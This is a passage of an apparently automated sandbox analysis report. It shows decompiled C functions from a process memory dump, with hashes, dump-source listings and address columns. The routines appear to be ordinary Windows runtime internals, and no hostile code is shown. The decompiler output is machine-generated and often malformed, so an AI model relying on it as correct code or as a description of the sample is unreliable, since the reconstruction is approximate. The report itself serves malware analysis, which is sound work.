                                                      0x049cfeba
                                                      0x00000000
                                                      0x049cfeba
                                                      0x049cfdfe
                                                      0x049cfe01
                                                      0x049cfe02
                                                      0x049cfe08
                                                      0x049cff0c
                                                      0x049cff14
                                                      0x049cff14

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                      • Instruction ID: dc800c326eb6ce318d0942cb2089f1d2d128a24f37f24a6a2c8af4bfa1e78b46
                                                      • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                      • Instruction Fuzzy Hash: B331F832300640AFE7219B68C858F6A7BEBEBC5750F58447DE4458B389DA74FC41C722
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049CEA55, Relevance: .1, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 70%
                                                      			E049CEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E04922280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E049CE815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E0490F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E0491FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E049CAFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E049CBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E04927D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E049BFE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E0491FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E049CA80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                                      0x049cea55
                                                      0x049cea66
                                                      0x049cea68
                                                      0x049cea6c
                                                      0x049cea6f
                                                      0x049cea72
                                                      0x049cea75
                                                      0x049cea7a
                                                      0x049cea7a
                                                      0x049cea7e
                                                      0x049cea80
                                                      0x049cea85
                                                      0x049cea8b
                                                      0x049ceab5
                                                      0x049ceabc
                                                      0x049ceabf
                                                      0x049ceabf
                                                      0x049ceaca
                                                      0x049ceace
                                                      0x049cead0
                                                      0x049ceae4
                                                      0x049ceaeb
                                                      0x049ceaf0
                                                      0x049ceaf5
                                                      0x049ceb09
                                                      0x049ceb0d
                                                      0x049ceb1d
                                                      0x049ceb2d
                                                      0x049ceb38
                                                      0x049ceb3d
                                                      0x049ceb41
                                                      0x049ceb4a
                                                      0x049ceb60
                                                      0x049ceb4c
                                                      0x049ceb52
                                                      0x049ceb59
                                                      0x049ceb59
                                                      0x049ceb68
                                                      0x049ceb71
                                                      0x049ceb71
                                                      0x049cea8d
                                                      0x049cea8f
                                                      0x049cea92
                                                      0x049cea97
                                                      0x049cea97
                                                      0x049cea9b
                                                      0x049cea9c
                                                      0x049cea9e
                                                      0x049ceaa6
                                                      0x049ceaa6
                                                      0x049ceb7e

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                      • Instruction ID: 8255244f622cba1e1aed9ebc2308a0d0ed507fbeb0af24590be68b0555e99071
                                                      • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                      • Instruction Fuzzy Hash: 263190726047059FDB19DF24C880A6BB7AAFBC0314F04493DE55787684EA30F805CBA6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049869A6, Relevance: .1, Instructions: 108COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 69%
                                                      			E049869A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x49fd360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L04916C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E04986BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E04949980() >= 0) {
							E04922280(_t56, 0x49f8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x49f8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x49f8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0490B6F0(0x48ec338, 0x48ec288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E04949520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E049495D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0491FFB0(_t68, _t77, 0x49f8778);
				}
				_pop(_t78);
				return E0494B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                      0x049869b5
                                                      0x049869be
                                                      0x049869c3
                                                      0x049869c9
                                                      0x049869cc
                                                      0x049869d1
                                                      0x049869d3
                                                      0x049869de
                                                      0x049869e1
                                                      0x049869ea
                                                      0x049869f6
                                                      0x049869fe
                                                      0x04986a13
                                                      0x04986a14
                                                      0x04986a15
                                                      0x04986a16
                                                      0x04986a1e
                                                      0x04986a26
                                                      0x04986a31
                                                      0x04986a36
                                                      0x04986a37
                                                      0x04986a40
                                                      0x04986a49
                                                      0x04986a4a
                                                      0x04986a53
                                                      0x04986a59
                                                      0x04986a5d
                                                      0x04986a5e
                                                      0x04986a64
                                                      0x04986a67
                                                      0x04986a6a
                                                      0x04986a6d
                                                      0x04986a70
                                                      0x04986a77
                                                      0x04986a7d
                                                      0x04986a86
                                                      0x04986a89
                                                      0x04986a9c
                                                      0x04986a9f
                                                      0x04986aa2
                                                      0x04986aa5
                                                      0x04986aaf
                                                      0x04986ab1
                                                      0x04986ab8
                                                      0x04986ab9
                                                      0x04986abb
                                                      0x04986abe
                                                      0x04986ac5
                                                      0x04986ac5
                                                      0x04986aaf
                                                      0x04986a40
                                                      0x04986a26
                                                      0x049869fe
                                                      0x04986ace
                                                      0x04986ad0
                                                      0x04986ad3
                                                      0x04986ad8
                                                      0x04986adf
                                                      0x04986adf
                                                      0x04986ae8
                                                      0x04986aef
                                                      0x04986aef
                                                      0x04986af9
                                                      0x04986b06

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 57aeca2cbb274566f257829f892ad990410ac34de30410e067bd459463849a87
                                                      • Instruction ID: 6d5a6fdc8dbdd854b24cbb1d63fa5788445e85eb2ee96d79309dd97b57e521d3
                                                      • Opcode Fuzzy Hash: 57aeca2cbb274566f257829f892ad990410ac34de30410e067bd459463849a87
                                                      • Instruction Fuzzy Hash: 53415EB1D00608AFDB14DFA9D940BFEBBF8EF88718F14853AE914A7250DB74A905CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04905210, Relevance: .1, Instructions: 107COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 85%
                                                      			E04905210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E049052A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E049495D0();
							L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0491EB70(_t54, 0x49f79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E049495D0();
								L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0491EB70(_t54, 0x49f79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0494F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0491EB70(_t54, 0x49f79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E049495D0();
							L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                      0x04905220
                                                      0x04905224
                                                      0x04960d13
                                                      0x04960d16
                                                      0x04960d19
                                                      0x0490522a
                                                      0x0490522a
                                                      0x0490522d
                                                      0x0490522d
                                                      0x04905231
                                                      0x04905235
                                                      0x04905239
                                                      0x04960d5c
                                                      0x04960d62
                                                      0x00000000
                                                      0x00000000
                                                      0x04960d6a
                                                      0x04960d7b
                                                      0x04960d7f
                                                      0x04960d81
                                                      0x04960d84
                                                      0x04960d95
                                                      0x04960d95
                                                      0x04960d6c
                                                      0x04960d71
                                                      0x04960d71
                                                      0x04960d9a
                                                      0x00000000
                                                      0x0490524a
                                                      0x0490524a
                                                      0x04905250
                                                      0x04960d24
                                                      0x04960d35
                                                      0x04960d39
                                                      0x04960d3b
                                                      0x04960d3e
                                                      0x04960d50
                                                      0x04960d50
                                                      0x04960d26
                                                      0x04960d2b
                                                      0x04960d2b
                                                      0x00000000
                                                      0x04960d55
                                                      0x04905256
                                                      0x0490525b
                                                      0x04905265
                                                      0x04960da7
                                                      0x0490526b
                                                      0x0490526e
                                                      0x04905272
                                                      0x04960db1
                                                      0x04960db4
                                                      0x04960dc5
                                                      0x04960dc5
                                                      0x04905272
                                                      0x04905278
                                                      0x0490527e
                                                      0x0490528a
                                                      0x0490528c
                                                      0x0490528d
                                                      0x00000000
                                                      0x04905280
                                                      0x04905282
                                                      0x04905288
                                                      0x0490529f
                                                      0x04905292
                                                      0x00000000
                                                      0x04905292
                                                      0x00000000
                                                      0x04905288
                                                      0x0490527e

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a675dca3f82ad9526bcf9931a33793605338676dd378ef2470c6731dccbf23df
                                                      • Instruction ID: b49b482b125f5cebb7090af74eb7bfdf4f8a05e00bec275ad9f0165e79187e36
                                                      • Opcode Fuzzy Hash: a675dca3f82ad9526bcf9931a33793605338676dd378ef2470c6731dccbf23df
                                                      • Instruction Fuzzy Hash: EE31D231651711EFD722DF28C890F6677A9BF90774F118B3AE8164B5E4EB70B840CA90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04943D43, Relevance: .1, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04943D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E04917B60(0, _t61, 0x48e11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E04917B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L04924620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                      0x04943d4c
                                                      0x04943d50
                                                      0x04943d55
                                                      0x04943d5e
                                                      0x0497e79a
                                                      0x00000000
                                                      0x0497e79a
                                                      0x04943d68
                                                      0x0497e789
                                                      0x04943d9d
                                                      0x04943da3
                                                      0x04943daf
                                                      0x04943db5
                                                      0x04943dbc
                                                      0x04943dc4
                                                      0x04943dc9
                                                      0x04943dce
                                                      0x0497e7ae
                                                      0x0497e7ae
                                                      0x04943dde
                                                      0x04943de2
                                                      0x04943de7
                                                      0x04943e0d
                                                      0x04943e13
                                                      0x04943e16
                                                      0x04943e1e
                                                      0x04943e25
                                                      0x04943e28
                                                      0x00000000
                                                      0x00000000
                                                      0x04943e2a
                                                      0x04943e2f
                                                      0x04943e37
                                                      0x04943e37
                                                      0x00000000
                                                      0x04943e37
                                                      0x04943e31
                                                      0x00000000
                                                      0x04943e31
                                                      0x04943e20
                                                      0x04943e20
                                                      0x04943e35
                                                      0x00000000
                                                      0x04943de9
                                                      0x04943de9
                                                      0x04943de9
                                                      0x04943dee
                                                      0x04943dfd
                                                      0x04943dff
                                                      0x04943e02
                                                      0x04943e05
                                                      0x04943e05
                                                      0x00000000
                                                      0x04943df0
                                                      0x04943de7
                                                      0x0497e78f
                                                      0x0497e794
                                                      0x04943d79
                                                      0x04943d84
                                                      0x04943d89
                                                      0x04943d8e
                                                      0x00000000
                                                      0x0497e7a4
                                                      0x04943d96
                                                      0x04943d9a
                                                      0x00000000
                                                      0x04943d9a
                                                      0x00000000
                                                      0x0497e794
                                                      0x04943d6e
                                                      0x04943d73
                                                      0x00000000
                                                      0x0497e7b5
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3abdd531d97ebad24f2bb3635427ca688fdd54c0289007cb803fea6cb899070
                                                      • Instruction ID: 3b23b915ab095e8971aca3ddf0711c35708c094c1e05c25441187e7dbdde2bdf
                                                      • Opcode Fuzzy Hash: a3abdd531d97ebad24f2bb3635427ca688fdd54c0289007cb803fea6cb899070
                                                      • Instruction Fuzzy Hash: 8D315B317056159BDB358F29C846E6BBBA9EFD5710B0584BAE849CB250E730E940DB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0493A61C, Relevance: .1, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			E0493A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x49e0220);
				E0495D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x49f7b9c; // 0x0
				_t55 = L04924620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0495D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x49f7b10 =  *0x49f7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x49f536c; // 0xc6ca60
					if( *_t51 != 0x49f5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x49f5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x49f536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0493A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                      0x0493a61c
                                                      0x0493a61e
                                                      0x0493a623
                                                      0x0493a628
                                                      0x0493a62b
                                                      0x0493a62d
                                                      0x0493a648
                                                      0x0493a64a
                                                      0x0493a64f
                                                      0x04979b44
                                                      0x0493a6ec
                                                      0x0493a6f1
                                                      0x0493a6f1
                                                      0x0493a655
                                                      0x0493a657
                                                      0x0493a65a
                                                      0x0493a65d
                                                      0x0493a662
                                                      0x0493a663
                                                      0x0493a667
                                                      0x0493a668
                                                      0x0493a66d
                                                      0x0493a706
                                                      0x0493a706
                                                      0x04979bda
                                                      0x04979be6
                                                      0x04979beb
                                                      0x00000000
                                                      0x04979beb
                                                      0x0493a679
                                                      0x04979b7a
                                                      0x00000000
                                                      0x04979b7a
                                                      0x0493a683
                                                      0x0493a6f4
                                                      0x0493a6f7
                                                      0x0493a6f9
                                                      0x0493a6fd
                                                      0x0493a6a0
                                                      0x0493a6a0
                                                      0x0493a6ad
                                                      0x0493a6af
                                                      0x0493a6b4
                                                      0x04979ba7
                                                      0x04979bac
                                                      0x00000000
                                                      0x00000000
                                                      0x04979bc6
                                                      0x04979bce
                                                      0x04979bd1
                                                      0x04979bd3
                                                      0x04979bd3
                                                      0x00000000
                                                      0x04979bd1
                                                      0x0493a6bd
                                                      0x0493a6c3
                                                      0x0493a6c6
                                                      0x0493a6d2
                                                      0x0493a701
                                                      0x0493a704
                                                      0x00000000
                                                      0x0493a704
                                                      0x0493a6d4
                                                      0x0493a6d6
                                                      0x0493a6d9
                                                      0x0493a6db
                                                      0x0493a6e1
                                                      0x0493a6e6
                                                      0x0493a6e8
                                                      0x0493a6e8
                                                      0x0493a6ea
                                                      0x00000000
                                                      0x0493a6ea
                                                      0x0493a688
                                                      0x0493a692
                                                      0x0493a694
                                                      0x0493a699
                                                      0x00000000
                                                      0x00000000
                                                      0x0493a69d
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9441229f5578d25468145694c4a3398ba46d547abb3db32bbdfd6685a155849c
                                                      • Instruction ID: 8872a3cc8aced41583dc49f59a58087871195617e51447b0d97a4bd9b2c65d40
                                                      • Opcode Fuzzy Hash: 9441229f5578d25468145694c4a3398ba46d547abb3db32bbdfd6685a155849c
                                                      • Instruction Fuzzy Hash: 47416AB5A00205DFDB14CF58C880BA9BBF2FB8A315F1580B9E805AB344D778B901CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04987016, Relevance: .1, Instructions: 104COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E04987016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x49fd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E04986B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E04986B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E04927D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E04949AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0494B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L04924620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                      0x04987016
                                                      0x0498701e
                                                      0x0498702b
                                                      0x04987033
                                                      0x04987037
                                                      0x0498703c
                                                      0x0498703e
                                                      0x04987041
                                                      0x04987045
                                                      0x0498704a
                                                      0x04987050
                                                      0x04987055
                                                      0x0498705a
